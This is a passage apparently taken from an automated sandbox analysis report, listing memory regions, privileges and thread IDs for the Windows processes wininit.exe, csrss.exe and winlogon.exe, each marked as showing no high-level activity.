| pagefile_0x000000aca1fc0000 | 0xaca1fc0000 | 0xaca1fcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca1fd0000 | 0xaca1fd0000 | 0xaca1fdffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca1fe0000 | 0xaca1fe0000 | 0xaca209ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000aca20a0000 | 0xaca20a0000 | 0xaca20affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca20b0000 | 0xaca20b0000 | 0xaca20bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca20b0000 | 0xaca20b0000 | 0xaca20b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca20c0000 | 0xaca20c0000 | 0xaca20cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000aca20d0000 | 0xaca20d0000 | 0xaca210ffff | Private Memory | rw |
|
|
|
- |
| cga40woa.fon | 0xaca2110000 | 0xaca2111fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000aca2120000 | 0xaca2120000 | 0xaca212ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca2130000 | 0xaca2130000 | 0xaca213ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| cga80woa.fon | 0xaca2140000 | 0xaca2141fff | Memory Mapped File | r |
|
|
|
- |
| ega40woa.fon | 0xaca2150000 | 0xaca2152fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000aca2160000 | 0xaca2160000 | 0xaca216ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca2170000 | 0xaca2170000 | 0xaca2170fff | Pagefile Backed Memory | rw |
|
|
|
- |
| consola.ttf | 0xaca2170000 | 0xaca21d8fff | Memory Mapped File | r |
|
|
|
- |
| consolab.ttf | 0xaca21e0000 | 0xaca223afff | Memory Mapped File | r |
|
|
|
- |
| consolai.ttf | 0xaca2240000 | 0xaca22aafff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ffc00000 | 0x7df5ffc00000 | 0x7ff5ffbfffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff63b158000 | 0x7ff63b158000 | 0x7ff63b159fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b15a000 | 0x7ff63b15a000 | 0x7ff63b15bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b15c000 | 0x7ff63b15c000 | 0x7ff63b15dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b15e000 | 0x7ff63b15e000 | 0x7ff63b15ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff63b160000 | 0x7ff63b160000 | 0x7ff63b25ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007ff63b260000 | 0x7ff63b260000 | 0x7ff63b282fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff63b283000 | 0x7ff63b283000 | 0x7ff63b284fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b285000 | 0x7ff63b285000 | 0x7ff63b286fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b287000 | 0x7ff63b287000 | 0x7ff63b288fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b289000 | 0x7ff63b289000 | 0x7ff63b28afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b28d000 | 0x7ff63b28d000 | 0x7ff63b28efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b28f000 | 0x7ff63b28f000 | 0x7ff63b28ffff | Private Memory | rw |
|
|
|
- |
| csrss.exe | 0x7ff63b3e0000 | 0x7ff63b3e6fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ff8eac70000 | 0x7ff8ead07fff | Memory Mapped File | rwx |
|
|
|
- |
| sxssrv.dll | 0x7ff8ead20000 | 0x7ff8ead2cfff | Memory Mapped File | rwx |
|
|
|
- |
| winsrv.dll | 0x7ff8ead30000 | 0x7ff8ead64fff | Memory Mapped File | rwx |
|
|
|
- |
| basesrv.dll | 0x7ff8ead70000 | 0x7ff8ead83fff | Memory Mapped File | rwx |
|
|
|
- |
| csrsrv.dll | 0x7ff8ead90000 | 0x7ff8eada4fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #58: wininit.exe
0
0
| Information | Value |
|---|---|
| ID | #58 |
| File Name | c:\windows\system32\wininit.exe |
| Command Line | wininit.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x198 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
228
0x
1D8
0x
1B0
0x
19C
|
Process #59: csrss.exe
0
0
| Information | Value |
|---|---|
| ID | #59 |
| File Name | c:\windows\system32\csrss.exe |
| Command Line | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1a0 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
4D0
0x
2E0
0x
2B4
0x
214
0x
210
0x
1FC
0x
1CC
0x
1C8
0x
1C4
0x
1C0
0x
1BC
0x
1A4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| locale.nls | 0xca80000000 | 0xca800bdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ca800c0000 | 0xca800c0000 | 0xca80240fff | Pagefile Backed Memory | r |
|
|
|
- |
| winsrv.dll.mui | 0xca86050000 | 0xca86051fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ca86060000 | 0xca86060000 | 0xca8606ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86070000 | 0xca86070000 | 0xca86083fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca86090000 | 0xca86090000 | 0xca8609ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| marlett.ttf | 0xca860a0000 | 0xca860a6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ca860b0000 | 0xca860b0000 | 0xca860c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca860d0000 | 0xca860d0000 | 0xca860dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca860e0000 | 0xca860e0000 | 0xca860effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca860f0000 | 0xca860f0000 | 0xca860fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86100000 | 0xca86100000 | 0xca8610ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ca86110000 | 0xca86110000 | 0xca8614ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86150000 | 0xca86150000 | 0xca86150fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86160000 | 0xca86160000 | 0xca86160fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ca86170000 | 0xca86170000 | 0xca86170fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca86180000 | 0xca86180000 | 0xca86181fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca86190000 | 0xca86190000 | 0xca86190fff | Private Memory | rw |
|
|
|
- |
| vgasys.fon | 0xca861a0000 | 0xca861a1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ca861b0000 | 0xca861b0000 | 0xca861effff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca861f0000 | 0xca861f0000 | 0xca8622ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca86230000 | 0xca86230000 | 0xca86236fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca86240000 | 0xca86240000 | 0xca8627ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca86280000 | 0xca86280000 | 0xca86280fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca86290000 | 0xca86290000 | 0xca862cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca862d0000 | 0xca862d0000 | 0xca862fffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ca86300000 | 0xca86300000 | 0xca863fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86400000 | 0xca86400000 | 0xca8640ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86410000 | 0xca86410000 | 0xca8641ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86420000 | 0xca86420000 | 0xca8642ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86430000 | 0xca86430000 | 0xca8643ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| segmdl2.ttf | 0xca86440000 | 0xca86463fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ca86470000 | 0xca86470000 | 0xca86470fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86480000 | 0xca86480000 | 0xca864b8fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca864c0000 | 0xca864c0000 | 0xca864cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca864d0000 | 0xca864d0000 | 0xca864dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca864e0000 | 0xca864e0000 | 0xca864effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca864f0000 | 0xca864f0000 | 0xca864fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| vgaoem.fon | 0xca86500000 | 0xca86501fff | Memory Mapped File | r |
|
|
|
- |
| dosapp.fon | 0xca86510000 | 0xca86518fff | Memory Mapped File | r |
|
|
|
- |
| cga40woa.fon | 0xca86520000 | 0xca86521fff | Memory Mapped File | r |
|
|
|
- |
| cga80woa.fon | 0xca86530000 | 0xca86531fff | Memory Mapped File | r |
|
|
|
- |
| ega40woa.fon | 0xca86540000 | 0xca86542fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ca86550000 | 0xca86550000 | 0xca8655ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| consola.ttf | 0xca86560000 | 0xca865c8fff | Memory Mapped File | r |
|
|
|
- |
| consolab.ttf | 0xca865d0000 | 0xca8662afff | Memory Mapped File | r |
|
|
|
- |
| consolai.ttf | 0xca86630000 | 0xca8669afff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ca866a0000 | 0xca866a0000 | 0xca866affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca866b0000 | 0xca866b0000 | 0xca866b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca866c0000 | 0xca866c0000 | 0xca866cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca866d0000 | 0xca866d0000 | 0xca866dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca866e0000 | 0xca866e0000 | 0xca866effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca866f0000 | 0xca866f0000 | 0xca866fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86700000 | 0xca86700000 | 0xca8670ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86710000 | 0xca86710000 | 0xca8671ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86720000 | 0xca86720000 | 0xca8672ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86730000 | 0xca86730000 | 0xca8673ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86740000 | 0xca86740000 | 0xca8674ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86750000 | 0xca86750000 | 0xca8675ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86760000 | 0xca86760000 | 0xca8676ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86770000 | 0xca86770000 | 0xca8677ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86780000 | 0xca86780000 | 0xca8678ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86790000 | 0xca86790000 | 0xca8679ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca867a0000 | 0xca867a0000 | 0xca867a4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca867b0000 | 0xca867b0000 | 0xca867bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca867c0000 | 0xca867c0000 | 0xca867c4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca867d0000 | 0xca867d0000 | 0xca867dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| segoeuib.ttf | 0xca867e0000 | 0xca868bbfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ca868c0000 | 0xca868c0000 | 0xca868cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca868d0000 | 0xca868d0000 | 0xca868dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca868e0000 | 0xca868e0000 | 0xca868effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca868f0000 | 0xca868f0000 | 0xca868fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca86900000 | 0xca86900000 | 0xca86a87fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ca86a90000 | 0xca86a90000 | 0xca86acffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca86ad0000 | 0xca86ad0000 | 0xca86b0ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0xca86b10000 | 0xca86beefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ca86bf0000 | 0xca86bf0000 | 0xca87feffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ca87ff0000 | 0xca87ff0000 | 0xca8802ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca88030000 | 0xca88030000 | 0xca88030fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca88040000 | 0xca88040000 | 0xca88040fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca88050000 | 0xca88050000 | 0xca8808ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88090000 | 0xca88090000 | 0xca8809ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca880a0000 | 0xca880a0000 | 0xca880affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca880a0000 | 0xca880a0000 | 0xca880a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ca880b0000 | 0xca880b0000 | 0xca880effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca880f0000 | 0xca880f0000 | 0xca885e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca885f0000 | 0xca885f0000 | 0xca885fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88600000 | 0xca88600000 | 0xca8860ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88610000 | 0xca88610000 | 0xca8861ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88620000 | 0xca88620000 | 0xca8862ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88620000 | 0xca88620000 | 0xca88620fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88630000 | 0xca88630000 | 0xca8863ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88640000 | 0xca88640000 | 0xca8864ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88650000 | 0xca88650000 | 0xca8865ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88660000 | 0xca88660000 | 0xca8866ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88670000 | 0xca88670000 | 0xca8867ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88680000 | 0xca88680000 | 0xca8868ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88690000 | 0xca88690000 | 0xca8869ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88690000 | 0xca88690000 | 0xca88690fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca886a0000 | 0xca886a0000 | 0xca886affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca886b0000 | 0xca886b0000 | 0xca886bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca886c0000 | 0xca886c0000 | 0xca886cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca886d0000 | 0xca886d0000 | 0xca886dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca886e0000 | 0xca886e0000 | 0xca886effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca886f0000 | 0xca886f0000 | 0xca886fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88700000 | 0xca88700000 | 0xca8870ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88710000 | 0xca88710000 | 0xca8871ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88720000 | 0xca88720000 | 0xca8872ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88730000 | 0xca88730000 | 0xca8873ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88740000 | 0xca88740000 | 0xca8874ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88750000 | 0xca88750000 | 0xca8875ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88760000 | 0xca88760000 | 0xca8876ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88770000 | 0xca88770000 | 0xca8877ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88780000 | 0xca88780000 | 0xca8878ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca88790000 | 0xca88790000 | 0xca8879ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca887a0000 | 0xca887a0000 | 0xca887affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca887b0000 | 0xca887b0000 | 0xca887bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca887c0000 | 0xca887c0000 | 0xca887cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca887d0000 | 0xca887d0000 | 0xca887d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca887d0000 | 0xca887d0000 | 0xca887dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca887f0000 | 0xca887f0000 | 0xca889eefff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca889f0000 | 0xca889f0000 | 0xca88beefff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff5a0000 | 0x7df5ff5a0000 | 0x7ff5ff59ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff63b0d4000 | 0x7ff63b0d4000 | 0x7ff63b0d5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b0d6000 | 0x7ff63b0d6000 | 0x7ff63b0d7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b0d8000 | 0x7ff63b0d8000 | 0x7ff63b0d9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b0da000 | 0x7ff63b0da000 | 0x7ff63b0dbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b0dc000 | 0x7ff63b0dc000 | 0x7ff63b0ddfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b0de000 | 0x7ff63b0de000 | 0x7ff63b0dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff63b0e0000 | 0x7ff63b0e0000 | 0x7ff63b1dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007ff63b1e0000 | 0x7ff63b1e0000 | 0x7ff63b202fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff63b204000 | 0x7ff63b204000 | 0x7ff63b205fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b206000 | 0x7ff63b206000 | 0x7ff63b207fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b208000 | 0x7ff63b208000 | 0x7ff63b209fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b20c000 | 0x7ff63b20c000 | 0x7ff63b20cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63b20e000 | 0x7ff63b20e000 | 0x7ff63b20ffff | Private Memory | rw |
|
|
|
- |
| csrss.exe | 0x7ff63b3e0000 | 0x7ff63b3e6fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ff8eac70000 | 0x7ff8ead07fff | Memory Mapped File | rwx |
|
|
|
- |
| sxssrv.dll | 0x7ff8ead20000 | 0x7ff8ead2cfff | Memory Mapped File | rwx |
|
|
|
- |
| winsrv.dll | 0x7ff8ead30000 | 0x7ff8ead64fff | Memory Mapped File | rwx |
|
|
|
- |
| basesrv.dll | 0x7ff8ead70000 | 0x7ff8ead83fff | Memory Mapped File | rwx |
|
|
|
- |
| csrsrv.dll | 0x7ff8ead90000 | 0x7ff8eada4fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #60: winlogon.exe
0
0
| Information | Value |
|---|---|
| ID | #60 |
| File Name | c:\windows\system32\winlogon.exe |
| Command Line | winlogon.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1d0 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CF8
0x
2F4
0x
2C0
0x
2BC
0x
20C
0x
200
0x
1D4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000007395d20000 | 0x7395d20000 | 0x7395d2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000007395d30000 | 0x7395d30000 | 0x7395d36fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000007395d40000 | 0x7395d40000 | 0x7395d53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000007395d60000 | 0x7395d60000 | 0x7395ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007395e60000 | 0x7395e60000 | 0x7395e66fff | Private Memory | rw |
|
|
|
- |
| user32.dll.mui | 0x7395e70000 | 0x7395e74fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000007395e80000 | 0x7395e80000 | 0x7395f7ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x7395f80000 | 0x739603dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000007396040000 | 0x7396040000 | 0x7396040fff | Private Memory | rw |
|
|
|
- |
| private_0x0000007396050000 | 0x7396050000 | 0x7396050fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000007396080000 | 0x7396080000 | 0x73960affff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000073960b0000 | 0x73960b0000 | 0x73960bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000073960c0000 | 0x73960c0000 | 0x7396247fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000007396250000 | 0x7396250000 | 0x73963d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000073964e0000 | 0x73964e0000 | 0x7396509fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000073965a0000 | 0x73965a0000 | 0x73965b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000007396620000 | 0x7396620000 | 0x739662ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007396630000 | 0x7396630000 | 0x73966affff | Private Memory | rw |
|
|
|
- |
| private_0x00000073966b0000 | 0x73966b0000 | 0x739672ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000007396790000 | 0x7396790000 | 0x7396910fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000007396920000 | 0x7396920000 | 0x7397d1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x7397d20000 | 0x7398056fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000007398060000 | 0x7398060000 | 0x739815ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000007398160000 | 0x7398160000 | 0x7398651fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffef0000 | 0x7df5ffef0000 | 0x7ff5ffeeffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7595be000 | 0x7ff7595be000 | 0x7ff7595bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7595c0000 | 0x7ff7595c0000 | 0x7ff7596bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7596c0000 | 0x7ff7596c0000 | 0x7ff7596e2fff | Pagefile Backed Memory | r |
|
|
|
- |
